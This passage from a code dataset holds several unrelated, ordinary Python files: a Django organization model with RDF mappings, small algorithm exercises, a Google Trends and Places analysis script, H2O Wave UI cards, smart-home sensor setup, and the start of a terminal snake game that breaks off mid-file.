models.EmailField(_(u'global email'), blank=True, null=True)\n email_sha1 = models.CharField(_(u'email checksum'),\n max_length=250, blank=True, null=True) # TODO : do this in Postgre\n web = models.URLField(_(u'web site'), blank=True, null=True)\n\n pref_email = models.ForeignKey('coop_local.Contact',\n verbose_name=_(u'preferred email'),\n related_name=\"pref_email\", null=True, blank=True,\n on_delete=models.SET_NULL)\n pref_phone = models.ForeignKey('coop_local.Contact',\n verbose_name=_(u'preferred phone'),\n related_name='pref_phone', null=True, blank=True,\n on_delete=models.SET_NULL)\n pref_address = models.ForeignKey('coop_local.Location',\n verbose_name=_(u'preferred postal address'),\n related_name='pref_address_org',\n null=True, blank=True,\n on_delete=models.SET_NULL)\n\n slug = exfields.AutoSlugField(populate_from='title', blank=True, overwrite=True)\n notes = models.TextField(_(u'notes'), blank=True)\n\n if \"coop.agenda\" in settings.INSTALLED_APPS:\n dated = generic.GenericRelation('coop_local.Dated')\n\n if \"coop.doc\" in settings.INSTALLED_APPS:\n attachments = generic.GenericRelation('coop_local.Attachment')\n\n external_links = generic.GenericRelation('coop_local.Link')\n mailing = models.BooleanField(_(u'receives mailing'), default=True)\n\n\n class Meta:\n abstract = True\n ordering = ['title']\n verbose_name = _(u'Organization')\n verbose_name_plural = _(u'Organizations')\n app_label = 'coop_local'\n\n def __unicode__(self):\n return unicode(self.title)\n\n def label(self):\n if self.pref_label == PREFLABEL.TITLE:\n return self.title\n elif self.pref_label == PREFLABEL.ACRO:\n return self.acronym\n\n if \"coop_geo\" in settings.INSTALLED_APPS:\n\n geom_manager = geomodels.GeoManager()\n\n def has_location(self):\n return self.located.all().count() > 0\n has_location.boolean = True\n has_location.short_description = _(u'geo')\n\n def locations(self):\n from coop_local.models import Location\n return Location.objects.filter(id__in=self.located.all().values_list('location_id', flat=True))\n\n def areas(self):\n from coop_local.models import Area\n return Area.objects.filter(id__in=self.framed.all().values_list('location_id', flat=True))\n\n def pref_geoJson(self):\n if self.pref_address and 
self.pref_address.point:\n json = self.pref_address.geoJson()\n json[\"properties\"][\"label\"] = self.label().encode(\"utf-8\")\n json[\"properties\"][\"category\"] = [c.slug.encode('utf-8') for c in self.category.all()]\n json[\"properties\"][\"popupContent\"] = u\"<p><a href='\" + \\\n self.get_absolute_url() + u\"'>\" + self.label() + u\"</a></p>\"\n return [json]\n else:\n return []\n\n # def pref_geoJson(self):\n # if self.pref_address:\n # json = self.pref_address.geoJson()\n # if json:\n # json[\"properties\"][\"label\"] = self.label().encode(\"utf-8\")\n # json[\"properties\"][\"organization\"] = self.organization.label().encode('utf-8')\n # json[\"properties\"][\"category\"] = [c.slug.encode('utf-8') for c in self.category.all()]\n # json[\"properties\"][\"popupContent\"] = u\"<p><a href='\" + \\\n # self.get_absolute_url() + u\"'>\" + self.label() + u\"</a></p>\"\n # return[json]\n # else:\n # return []\n # else:\n # return []\n\n\n\n\n def locations_geoJson(self):\n res = self.pref_geoJson()\n other_locations = set(self.locations()).difference(set([self.pref_address]))\n for loc in other_locations:\n located = self.located.get(location=loc)\n json = located.geoJson()\n json[\"properties\"][\"label\"] = self.label().encode(\"utf-8\")\n res.append(json)\n return res\n\n def areas_geoJson(self):\n res = []\n for al in self.framed.all():\n res.append(al.geoJson())\n return res\n\n def all_geoJson(self):\n res = self.locations_geoJson()\n res.extend(self.areas_geoJson())\n return res\n\n def has_description(self):\n return self.description and len(self.description) > 20\n \n has_description.boolean = True\n has_description.short_description = _(u'desc.')\n\n def logo_list_display(self):\n try:\n if self.logo:\n thumb = default.backend.get_thumbnail(self.logo.file, settings.ADMIN_THUMBS_SIZE)\n return '<img width=\"%s\" src=\"%s\" />' % (thumb.width, thumb.url)\n else:\n return _(u\"No Image\")\n except IOError:\n return _(u\"No Image\")\n\n logo_list_display.short_description = _(u\"logo\")\n logo_list_display.allow_tags = True\n\n #@models.permalink\n def get_absolute_url(self):\n return reverse('org_detail', args=[self.slug])\n\n def get_admin_url(self):\n return reverse('admin:coop_local_organization_change', args=[self.id])\n\n def get_relations(self):\n relations = {}\n # relmap = RELATIONS.REVERTED_CHOICES_CONST_DICT\n\n for rel in self.source.all():\n reltype = str('OUT_' + rel.relation_type.key_name) # me => others\n relations[reltype] = []\n relations[reltype].append(rel.target)\n for rel in self.target.all():\n reltype = str('IN_' + rel.relation_type.key_name) # others said this\n if reltype not in relations:\n relations[reltype] = []\n #if rel.confirmed: # which one are confirmed by both parts\n relations[reltype].append(rel.source)\n return relations\n\n # def local_uri(self):\n # return ('http://dev.credis.org:8000/org/' + self.slug + '/')\n\n def main_location(self):\n if self.located.all().exists():\n return self.located.all()[0].location\n else:\n return None\n\n\n\n def save(self, *args, **kwargs):\n # Set default values for preferred email, phone and postal address\n # if not self.pref_phone : # bizarre ici il FAUT faire == None et pour pref_mail c'est if not...\n # phone_categories = [1, 2]\n # fixes = self.contacts.filter(contact_medium_id__in=phone_categories)\n # if fixes.exists():\n # self.pref_phone = fixes[0]\n\n # if not self.pref_email:\n # orgmails = self.contacts.filter(contact_medium_id=8)\n # if orgmails.exists():\n # self.pref_email = orgmails[0]\n # 
else:\n # self.pref_email = self.members.all()[0].pref_email\n \n\n if 'coop_geo' in settings.INSTALLED_APPS:\n if self.pref_address == None:\n locations = self.located.all() # should we have a \"main venue\" ?\n if locations.count() > 0:\n self.pref_address = locations[0].location\n\n # TODO move this to Contact model or do it in SQL\n\n # if self.email and self.email != '':\n # import hashlib\n # m = hashlib.sha1()\n # m.update(self.email)\n # self.email_sha1 = m.hexdigest()\n super(BaseOrganization, self).save(*args, **kwargs)\n\n def get_edit_url(self):\n return reverse('org_edit', args=[self.slug])\n\n def get_cancel_url(self):\n return reverse('org_edit_cancel', args=[self.slug])\n\n def _can_modify_organization(self, user):\n if user.is_authenticated():\n if user.is_superuser:\n return True\n elif user.person in self.members.all():\n return True\n else:\n return False\n\n def can_view_organization(self, user):\n # TODO use global privacy permissions on objects\n return True\n\n def can_edit_organization(self, user):\n return self._can_modify_organization(user)\n\n rdf_type = settings.NS.org.Organization\n\n def isOpenData(self):\n return self.active\n\n base_mapping = [\n ('single_mapping', (settings.NS.dct.created, 'birth'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n ('single_mapping', (settings.NS.legal.legalName, 'title'), 'single_reverse'),\n ('single_mapping', (settings.NS.ov.prefAcronym, 'acronym'), 'single_reverse'),\n ('single_mapping', (settings.NS.rdfs.comment, 'subtitle'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.description, 'description'), 'single_reverse'),\n ('single_mapping', (settings.NS.foaf.mbox_sha1sum, 'email_sha1'), 'single_reverse'),\n ('single_mapping', (settings.NS.foaf.homepage, 'web'), 'single_reverse'),\n ('single_mapping', (settings.NS.foaf.birthday, 'birth'), 'single_reverse'),\n ('single_mapping', (settings.NS.vcard.tel, 'pref_phone'), 'single_reverse'),\n ('single_mapping', (settings.NS.vcard.mail, 'pref_email'), 'single_reverse'),\n ('single_mapping', (settings.NS.legal.registeredAddress, 'pref_address'), 'single_reverse'),\n ('single_mapping', (settings.NS.skos.note, 'notes'), 'single_reverse'),\n\n ('multi_mapping', (settings.NS.dct.subject, 'tags'), 'multi_reverse'), \n # FIXME : Organization objects need to have a primary key value before you can access their tags.\n\n ('multi_mapping', (settings.NS.ess.hasContactMedium, 'contacts'), 'multi_reverse'),\n # FIXME : 'Contact' instance expected\n\n ('multi_mapping', (settings.NS.org.hasMember, 'members'), 'none_reverse'),\n # FIXME : 'Organization' instance needs to have a primary key value before a many-to-many relationship can be used.\n\n\n ('logo_mapping', (settings.NS.foaf.logo, 'logo'), 'logo_mapping_reverse'),\n ('prefLabel_mapping', (settings.NS.rdfs.label, 'pref_label'), 'prefLabel_mapping_reverse'),\n \n ('location_mapping', (settings.NS.locn.location, 'located'), 'location_mapping_reverse'),\n # FIXME : Located matching query does not exist.\n\n ('location_mapping', (settings.NS.ess.actionArea, 'framed'), 'location_mapping_reverse'),\n ('exchange_mapping', (settings.NS.gr.offers, settings.NS.gr.seeks), 'exchange_mapping_reverse'),\n ('engagement_mapping', (settings.NS.org.organization, 'engagement_set'), 'engagement_mapping_reverse'),\n\n ]\n\n\n # We to add in the graph the coresponding Engagement\n def engagement_mapping(self, rdfPred, djF):\n res = []\n for e in getattr(self, djF).all():\n 
res.append((rdflib.term.URIRef(e.uri), rdfPred, rdflib.term.URIRef(self.uri)))\n return res\n\n def engagement_mapping_reverse(self, g, rdfPred, djF):\n pass\n\n def location_mapping(self, rdfPred, djF):\n values = map(lambda x: x.location, getattr(self, djF).all())\n return self.multi_mapping_base(values, rdfPred)\n\n def location_mapping_reverse(self, g, rdfPred, djField, lang=None):\n rdf_values = set(g.objects(rdflib.term.URIRef(self.uri), rdfPred))\n # Values contient des instances de Location. \n # Il faut remonter soit a des Located soit a des AreaLink\n values = map(coop.models.StaticURIModel.toDjango, rdf_values)\n if djField == 'located':\n m = models.get_model('coop_geo', 'located')\n try:\n values = set(map(lambda x: m.objects.get(object_id=self.id, location=x), values))\n except m.DoesNotExist:\n values = set([])\n elif djField == 'framed':\n m = models.get_model('coop_geo', 'arealink')\n try:\n values = set(map(lambda x: m.objects.get(object_id=self.id, location=x), values))\n except m.DoesNotExist:\n values = set([])\n manager = getattr(self, djField)\n old_values = set(manager.all())\n remove = old_values.difference(values)\n add = values.difference(old_values)\n for v in remove:\n manager.remove(v)\n for v in add:\n manager.add(v)\n\n def logo_mapping(self, rdfPred, djF):\n logo = getattr(self, djF)\n if logo == None:\n return []\n else:\n try:\n rdfSubject = rdflib.term.URIRef(self.uri)\n rdfValue = rdflib.term.URIRef('http://' + str(Site.objects.get_current().domain) + logo.url)\n return [(rdfSubject, rdfPred, rdfValue)]\n except ValueError:\n return []\n\n # TODO : télécharger le logo dans un dossier /tmp et le passer à sorl.thumbnail pour traitement\n def logo_mapping_reverse(self, g, rdfPred, djF):\n value = list(g.objects(rdflib.term.URIRef(self.uri), rdfPred))\n if len(value) == 1:\n value = value[0].toPython()\n scheme, host, path, query, fragment = urlsplit(value)\n sp = path.split('/')\n setattr(self, djF, \"%s:%s\" % (sp[len(sp) - 2], sp[len(sp) - 1]))\n else:\n pass\n\n def prefLabel_mapping(self, rdfPred, djF, lang=None):\n label = self.label()\n if label == None:\n return []\n else:\n subject_args = {}\n if lang:\n subject_args['lang'] = lang\n rdfValue = rdflib.term.Literal(unicode(label), **subject_args)\n return[(rdflib.term.URIRef(self.uri), rdfPred, rdfValue)]\n\n def prefLabel_mapping_reverse(self, g, rdfPred, djF, lang=None):\n value = list(g.objects(rdflib.term.URIRef(self.uri), rdfPred))\n title = list(g.objects(rdflib.term.URIRef(self.uri), settings.NS.legal.legalName))\n if value == title:\n setattr(self, 'pref_label', PREFLABEL.TITLE)\n else:\n setattr(self, 'pref_label', PREFLABEL.ACRO)\n\n def exchange_mapping(self, rdfOffer, rdfSeek, lang=None):\n from coop.exchange.models import EWAY\n values = models.get_model('coop_local', 'exchange').objects.filter(organization=self)\n rdfSubject = rdflib.term.URIRef(self.uri)\n result = []\n for value in values:\n if value.eway == EWAY.OFFER:\n result.append((rdfSubject, rdfOffer, rdflib.term.URIRef(value.uri)))\n else:\n result.append((rdfSubject, rdfSeek, rdflib.term.URIRef(value.uri)))\n return result\n\n def exchange_mapping_reverse(self, g, rdfOffer, rdfSeek, lang=None):\n from coop.exchange.models import EWAY\n values = list(g.objects(rdflib.term.URIRef(self.uri), rdfOffer))\n exchangeModel = models.get_model('coop_local', 'exchange')\n for value in values:\n exists = exchangeModel.objects.filter(uri=str(value)).exists()\n if exists:\n ex = exchangeModel.objects.get(uri=str(value))\n ex.eway = 
EWAY.OFFER\n ex.organization = self\n ex.save()\n values = list(g.objects(rdflib.term.URIRef(self.uri), rdfSeek))\n for value in values:\n exists = exchangeModel.objects.filter(uri=str(value)).exists()\n if exists:\n ex = exchangeModel.objects.get(uri=str(value))\n ex.eway = EWAY.NEED\n ex.organization = self\n ex.save()\n\n\n# TODO : use django-multilingual-ng to translate the label field in multiple languages\n# Copied from OrgrelationType, goal is to use the same properties, as Project are Collaborations, a RDF subclass of project\n\n# class BaseCollaborationType(models.Model): # this model will be initialized with a fixture\n# label = models.CharField(_(u'label'), max_length=250)\n# uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n\n# def __unicode__(self):\n# return self.label\n\n# class Meta:\n# verbose_name = _(u'Collaboration type')\n# verbose_name_plural = _(u'Collaboration types')\n# app_label = 'coop_local'\n\n\n\n\n","repo_name":"credis/django-coop","sub_path":"coop/org/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":35232,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"29870326293","text":"import math\n\nn = 524287\nk = 2\n# 524287,2\n\n\ndef changeBase(n, q):\n rev_base = ''\n while n > 0:\n n, mod = divmod(n, q)\n rev_base += str(mod)\n\n return rev_base[::-1]\n\n\ndef is_prime_number(x):\n if x == 1:\n return False\n for i in range(2,int(x**0.5)+1):\n if x % i == 0:\n return False # 소수가 아님\n return True # 소수임\n\n\n\na = changeBase(n,k)\nprint(a)\n\nzeros = []\nanswer = 0\nt = \"\"\nfor i in range(len(a)):\n if a[i] == \"0\":\n if len(zeros) == 0:\n if is_prime_number(int(a[:i])):\n answer += 1\n # print(\"zz\")\n t = \"\"\n zeros.append(i)\n else:\n print(t,i)\n if len(t) > 0:\n if is_prime_number(int(t)):\n answer += 1\n # print(\"bb\", t)\n t = \"\"\n zeros.append(i)\n else:\n t = t + a[i]\n\nprint(\"b\")\nif len(t) > 0:\n if is_prime_number(int(t)):\n answer += 1\n# print(\"b\")\nprint(answer)","repo_name":"yleer/BackjoonAlgoStudy2022","sub_path":"Programmers/k 진수 소수 구하기.py","file_name":"k 진수 소수 구하기.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3638845092","text":"# CSC 242-503\r\n# Assignment 7 \r\n\r\n# Patrick Krebs\r\n# I worked a little bit with Darian on this assignment. 
We didn't share any code\r\n# but a couple of times we talked through the bigger picture ideas behind\r\n# a couple of questions and talked through our approaches to the solutions.\r\n\r\nimport os\r\n\r\n# Question 1\r\ndef recListSum(lst):\r\n 'returns the sum of the numbers in the list.'\r\n if len(lst) == 0:\r\n return 0\r\n else:\r\n if type(lst[0]) == list:\r\n return recListSum(lst[0]) + recListSum(lst[1:])\r\n elif type(lst[0]) == int or type(lst[0]) == float:\r\n return lst[0] + recListSum(lst[1:])\r\n else:\r\n return 0 + recListSum(lst[1:])\r\n\r\n\r\n# Question 2\r\ndef depthCount(lst):\r\n 'returns the maximum depth to which the list has nested sublists'\r\n if lst == []:\r\n return 0\r\n elif type(lst[0]) == list:\r\n f = depthCount(lst[0]) + 1 # we stripped it out of a list\r\n r = depthCount(lst[1:])\r\n if f > r: # f is more deeply nested\r\n return f\r\n else: # r is more deeply nested\r\n return r\r\n else: # lst[0] is not a list\r\n return depthCount(lst[1:])\r\n \r\n\r\n\r\n \r\n# Question 3\r\ndef search(fname, path):\r\n '''searches for the file in the folder and any folder contained within it,\r\n directly or indirectly.'''\r\n for item in os.listdir(path):\r\n if item[0] != '.':\r\n n = os.path.join(path, item)\r\n if os.path.isfile(n):\r\n if item == fname:\r\n return n\r\n elif os.path.isdir(n):\r\n result = search(fname, n)\r\n if result != None:\r\n return result \r\n return None\r\n \r\n \r\n\r\n# Question 4\r\ndef fileCount(path):\r\n 'returns the number of files found in the directory and any subdirectories'\r\n count = 0 \r\n for item in os.listdir(path):\r\n if item[0] != '.':\r\n n = os.path.join(path, item)\r\n if os.path.isfile(n):\r\n count += 1 \r\n elif os.path.isdir(n):\r\n count += fileCount(n)\r\n return count \r\n \r\n \r\n","repo_name":"asccharania/learning","sub_path":"python/csc242hw7.py","file_name":"csc242hw7.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10077413890","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 15 14:30:21 2023\r\nRepository : https://github.com/carolinacorral/trendsnplaces\r\n\r\n@author: Carolina Corral \r\n\r\n\"\"\"\r\n\r\nfrom pytrends.request import TrendReq\r\nimport pandas as pd\r\nimport requests\r\nfrom adjustText import adjust_text\r\nfrom geopy.geocoders import Nominatim\r\nimport time \r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.backends.backend_pdf as pdf\r\n\r\npytrend = TrendReq()\r\n# specify the keyword, geo code, and time frame (optional)\r\nkeyword = 'dog park' \r\ngeo = 'US-CA'\r\n\r\n# Replace YOUR_API_KEY with your actual API key\r\nAPI_KEY = 'YOUR_API_KEY'\r\n\r\n# Build the payload\r\npytrend.build_payload(kw_list=[keyword], geo=geo)\r\n\r\n# Retrieve the interest by region data and store it in a DataFrame\r\ninterest_df = pytrend.interest_by_region() \r\n\r\nloc_df = interest_df.reset_index(drop=False)\r\n\r\n\r\n# Function to get the latitude and longitude of a location using geopy\r\ndef get_lat_long(location):\r\n # Use geopy to get the latitude and longitude of the given location\r\n geolocator = Nominatim(user_agent=\"http\")\r\n location = geolocator.geocode(location,timeout=None)\r\n if location is not None:\r\n return (location.latitude, location.longitude)\r\n else:\r\n return (None, None)\r\n\r\n\r\n# Add two new columns to the dataframe for the latitude and longitude values\r\nloc_df['latitude'] = 0.0\r\nloc_df['longitude'] 
= 0.0\r\n\r\n# Loop through each row in the dataframe\r\nfor index, row in loc_df.iterrows():\r\n # Get the latitude and longitude of the current row's geoName using geopy\r\n location = row['geoName']\r\n lat, long = get_lat_long(location)\r\n \r\n # Update the latitude and longitude values in the dataframe\r\n loc_df.at[index, 'latitude'] = lat\r\n loc_df.at[index, 'longitude'] = long\r\n\r\n\r\n# Function to get the number of results\r\ndef get_num_results(latitude, longitude):\r\n if latitude is None or longitude is None:\r\n return None\r\n \r\n \r\n params = {\r\n 'key': API_KEY,\r\n 'query': keyword, \r\n 'location': f'{latitude},{longitude}',\r\n 'radius': 10, # Desired radius in meters\r\n 'minrating': 3, # minimum rating score\r\n }\r\n\r\n \r\n # Send a GET request to the Places API\r\n response = requests.get('https://maps.googleapis.com/maps/api/place/nearbysearch/json', params=params)\r\n\r\n # Retrieve the number of places returned by the search\r\n results = response.json()\r\n num_places = len(results['results'])\r\n\r\n # Loop to retrieve more results if there are more than 20 available\r\n while 'next_page_token' in results:\r\n \r\n time.sleep(2)\r\n\r\n params['pagetoken'] = results['next_page_token']\r\n\r\n # Send a GET request to the Places API to fetch the next page of results\r\n response = requests.get('https://maps.googleapis.com/maps/api/place/nearbysearch/json', params=params)\r\n\r\n # Retrieve the number of places returned by the search\r\n results = response.json()\r\n num_places += len(results['results'])\r\n\r\n\r\n return num_places\r\n\r\n# Create an empty dataframe to store the results\r\nresults_df = pd.DataFrame(columns=['geoName', 'num_results'])\r\n\r\n# Loop through each row in the dataframe and get the number of search results\r\nfor index, row in loc_df.iterrows():\r\n \r\n latitude = row['latitude']\r\n longitude = row['longitude']\r\n\r\n \r\n num_results = get_num_results(latitude, longitude) \r\n\r\n # Add the location name and number of search results to the results dataframe\r\n results_df.loc[index] = [row['geoName'], num_results]\r\n\r\n\r\n# Find the maximum value of \"num_results\"\r\nmax_num_results = results_df['num_results'].max()\r\n\r\n# Calculate the percentages\r\nresults_df['percentage'] = (results_df['num_results'] / max_num_results) * 100\r\n\r\n\r\n# Merge the 'num_results' column from results_df into loc_df based on 'geoName'\r\nmerged_df = loc_df.merge(results_df[['geoName', 'num_results']], on='geoName')\r\n\r\nmerged_df = merged_df[merged_df[keyword] != 0]\r\n\r\n# Calculate the ratio between 'num_results' and the keyword's interest value\r\nmerged_df['division'] = merged_df.apply(lambda row: round(row['num_results'] / row[keyword], 2), axis=1)\r\n\r\n\r\n# Create a heat map using seaborn\r\nheat_map = plt.figure(figsize=(12, 8))\r\nsns.heatmap(merged_df.pivot(index='geoName', columns='division', values='division'),\r\n cmap='RdYlGn', vmin=0, vmax=merged_df['division'].max(), annot=True, fmt='.2f')\r\n\r\nplt.title('Relation between interest and availability')\r\nplt.xlabel('Number of results to popularity ratio')\r\nplt.ylabel('City Name')\r\n\r\nsct = plt.figure(figsize=(12,8))\r\nplt.scatter(merged_df[keyword], merged_df['num_results'])\r\nplt.xlabel('Interest')\r\nplt.ylabel('Number of places')\r\nplt.title('Interest vs Availability')\r\nlabels= []\r\nfor i, row in merged_df.iterrows():\r\n x_val = row[keyword]\r\n y_val = row['num_results']\r\n label = row['geoName']\r\n text = plt.text(x_val, y_val, label, ha='left', va='bottom')\r\n 
labels.append(text)\r\n \r\nadjust_text(labels, arrowprops=dict(arrowstyle='-', color='gray'))\r\n\r\nsct_no_name = plt.figure(figsize=(12,8))\r\nplt.scatter(merged_df[keyword], merged_df['num_results'])\r\nplt.xlabel('Interest')\r\nplt.ylabel('Number of places')\r\nplt.title('Interest vs Availability')\r\n\r\n\r\n# Sort the dataframe by interest value in descending order\r\nsorted_by_interest = merged_df.sort_values(keyword, ascending=False)\r\n\r\n# Sort the dataframe by num_places value in descending order\r\nsorted_by_num_places = merged_df.sort_values('num_results', ascending=False)\r\n\r\n# Histogram of interest values\r\ninterest_rank = plt.figure(figsize=(10,6))\r\nplt.barh(sorted_by_interest['geoName'], sorted_by_interest[keyword])\r\nplt.xlabel('Place',wrap=True)\r\nplt.ylabel('Interest Value')\r\nplt.title('Places Ranked by Interest')\r\nplt.xticks(rotation=90)\r\n\r\n# Histogram of num_places values\r\nnums_rank = plt.figure(figsize=(10,6))\r\nplt.barh(sorted_by_num_places['geoName'], sorted_by_num_places['num_results'])\r\nplt.xlabel('Place',wrap=True)\r\nplt.ylabel('Number of Places')\r\nplt.title('Places Ranked by Number of Results')\r\nplt.xticks(rotation=90)\r\n\r\n# Create a PDF object\r\npdf_file = pdf.PdfPages('C:/Users/Carolina/proyc/metodos/trends/results/results.pdf')\r\n\r\n# Add each plot to the PDF file\r\npdf_file.savefig(sct, bbox_inches='tight')\r\npdf_file.savefig(sct_no_name, bbox_inches='tight')\r\npdf_file.savefig(interest_rank, bbox_inches='tight')\r\npdf_file.savefig(nums_rank, bbox_inches='tight')\r\n# Add more plots as needed\r\n\r\n# Close the PDF file\r\npdf_file.close()\r\n\r\n","repo_name":"carolinacorral/trendsnplaces","sub_path":"interest_visualization.py","file_name":"interest_visualization.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71595820003","text":"from h2o_wave import ui, Q, data\n\nfrom src.utils import (\n get_method_level_rules,\n get_class_level_rules,\n get_code_file,\n get_example_code_choices\n)\n\n\ndef header_card(q: Q):\n return ui.header_card(\n box='header',\n title=q.app.toml['App']['Title'],\n subtitle=f\"{q.app.toml['App']['Description']}\",\n icon=\"Broom\",\n items=[\n ui.persona(title='Guest User', initials_color=\"#000000\", initials='G', size='xs'),\n ]\n )\n\n\ndef chat_card():\n return ui.chatbot_card(\n box=\"body_right\",\n name=\"chatbot\",\n placeholder=\"Ready to untangle Python code? 
Ask away - I'm on a clean code mission!\",\n data=data('content from_user', t='list', rows=[]),\n )\n\n\ndef user_code_card(q):\n return ui.form_card(\n box=\"top_left\",\n items=[\n ui.textbox(\n name=\"user_code\",\n label=\"Insert your code here!\",\n width=\"100%\",\n height=\"200px\",\n multiline=True,\n value=get_code_file(q.client.example_code) if q.client.example_code is not None else None,\n ),\n ui.inline(\n items=[\n ui.dropdown(\n name=\"example_code\",\n label=\"Or pick an example!\",\n trigger=True,\n width=\"200px\",\n choices=get_example_code_choices(),\n value=q.client.example_code\n ),\n ]\n ),\n ]\n )\n\n\ndef checklist_card(q):\n return ui.form_card(\n box=\"bottom_left\",\n items=[\n ui.separator(label=\"Code Quality Checklist\"),\n ui.text(\"\"),\n ui.inline(\n items=[\n ui.checklist(\n name=\"method_level_checks\",\n label=\"Method level\",\n choices=get_method_level_rules(),\n values=q.client.method_level_checks\n ),\n ui.checklist(\n name=\"class_level_checks\",\n label=\"Class level\",\n choices=get_class_level_rules(),\n values=q.client.class_level_checks\n )\n ]\n ),\n ui.button(\n name=\"inspect_code\",\n label=\"Analyze Code\",\n ),\n ]\n )\n\n\ndef response_card():\n return ui.form_card(\n box=\"body_right\",\n items=[\n ui.text(content='')\n ]\n )\n\n\ndef footer_card():\n return ui.footer_card(\n box='footer',\n caption='Made with 💛 and [H2O Wave](https://wave.h2o.ai).'\n )\n\n\ndef device_not_supported_card():\n return ui.form_card(\n box='device-not-supported',\n items=[\n ui.text_xl(\n 'This app was built desktop; it is not available on mobile or tablets.'\n )\n ],\n )","repo_name":"h2oai/genai-app-store-apps","sub_path":"python-code-inspector/src/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"38288269665","text":"import sys\n\ninput = sys.stdin.readline\nn,m = map(int, input().split())\narr = [int(input()) for _ in range(n)]\n\nstart = 0\nend = max(arr) * m\nresult = 0\n\nwhile start <= end:\n mid = (start + end) // 2\n total = 0\n \n for i in arr:\n total += mid//i\n \n if total >= m:\n end = mid - 1\n result = mid\n else:\n start = mid + 1\n\nprint(result)","repo_name":"ProblemSolveStudy/Kyung_mo","sub_path":"Baekjoon/B_3079.py","file_name":"B_3079.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21292193431","text":"#枚举\nli = [\"a\", \"b\", \"c\", \"d\"]\nstr1 = \"abcd\"\ndc = {1:1, 2:2, 3:3, 4:4}\n\nfor x, y in enumerate(li):\n print(x, y)\n\nfor x, y in enumerate(str1, 2):\n print(x, y)\n\nfor x in enumerate(dc, 3):\n print(x)","repo_name":"circularring1059/python","sub_path":"function/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45372793669","text":"\"\"\"Devices.\"\"\"\n\nimport asyncio\nfrom typing import Any, Coroutine\n\nfrom src.deconz import Websocket\nfrom src.deconz import sensors\nfrom src.yeelight import Bulb\nfrom src.base import logic\nfrom src.utils.logger import LoggerLevel, get_logger\n\nlogger = get_logger(__name__, LoggerLevel.INFO)\n\ntasks1: list[Coroutine[Any, Any, None]] = []\n\ndeconz_ws = Websocket()\nsensor_open_close = sensors.OpenClose(\n \"Датчик открытия\",\n 2,\n deconz_ws,\n atasks=tasks1,\n)\nsensor_presence = sensors.Presence(\n \"Датчик 
присутствия\",\n 3,\n deconz_ws,\n atasks=tasks1,\n update_rate=1,\n)\nsensor_light_level = sensors.LightLevel(\n \"Уровень освещенности\",\n 4,\n deconz_ws,\n atasks=tasks1,\n)\nbulb = Bulb(\"192.168.101.20\", atasks=tasks1)\nsensor_humidity = sensors.Humidity(\n \"Датчик влажности\",\n 11,\n deconz_ws,\n atasks=tasks1,\n)\nsensor_temperature = sensors.ZHATemperature(\n \"Датчик температуры\",\n 12,\n deconz_ws,\n atasks=tasks1,\n)\nsensor_pressure = sensors.ZHAPressure(\n \"Датчик давления\",\n 13,\n deconz_ws,\n atasks=tasks1,\n)\n\n\nasync def _run() -> None:\n pos_front = logic.PosFront()\n neg_front = logic.NegFront()\n while True:\n presence = await sensor_presence.presence()\n if pos_front(presence).value:\n bulb.data.power.write(True, duration=1000)\n if neg_front(presence).value:\n bulb.data.power.write(False, duration=10000)\n await asyncio.sleep(0)\n\n\ntasks = [\n deconz_ws.task(),\n _run(),\n]\n\ntasks.extend(tasks1)\n","repo_name":"Konstantin-Dudersky/smarthome","sub_path":"server/src/devices/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39003793646","text":"# Author: Runar Fosse\n# Time complexity: O(log n)\n# Space complexity: O(1)\n\nclass Solution:\n def hammingWeight(self, n: int) -> int:\n # Using bit manipulation\n ones = 0\n while n:\n if n & 1:\n ones += 1\n n >>= 1\n \n return ones","repo_name":"RunarFosse/leetcode","sub_path":"Easy/number-of-1-bits.py","file_name":"number-of-1-bits.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5685128159","text":"from random import choice\nfrom itertools import product\nfrom os import system\nfrom time import sleep\nfrom pynput.keyboard import Listener, Key\n\n\nKEY_TO_DIRECTION = {\n Key.up : 'up',\n Key.down : 'down',\n Key.left : 'left',\n Key.right : 'right'\n}\n\nclass SnakeCollisionError(Exception):\n pass\n\nclass SnakeEndCondition(Exception):\n pass\n\nclass Snake():\n def __init__(self):\n rows = []\n for _ in range(10):\n row = ['.'] * 10\n rows.append(row)\n self.rows = rows\n self.snake = [(5, 5), (5, 4), (5, 3), (5, 2)]\n self.food_cords = (3, 3)\n self.direction = 'left'\n self.last_direction = 'left'\n self.all_board_cords = set(product(range(10), range(10)))\n\n def set_direction(self, direction):\n self.direction = direction\n\n def draw_food(self):\n x, y = self.food_cords\n self.rows[x][y] = 'o'\n\n def get_empty_board_cords(self):\n snake_cords = set(self.snake)\n return self.all_board_cords.difference(snake_cords)\n\n def empty_grid(self):\n for row in self.rows:\n for n in range(len(row)):\n row[n] = '.'\n\n def put_snake_in_rows(self):\n for x, y in self.snake:\n self.rows[x][y] = 'x'\n\n def move_snake(self):\n if not self.is_next_turn_valid():\n self.direction = self.last_direction\n \n snake_head = 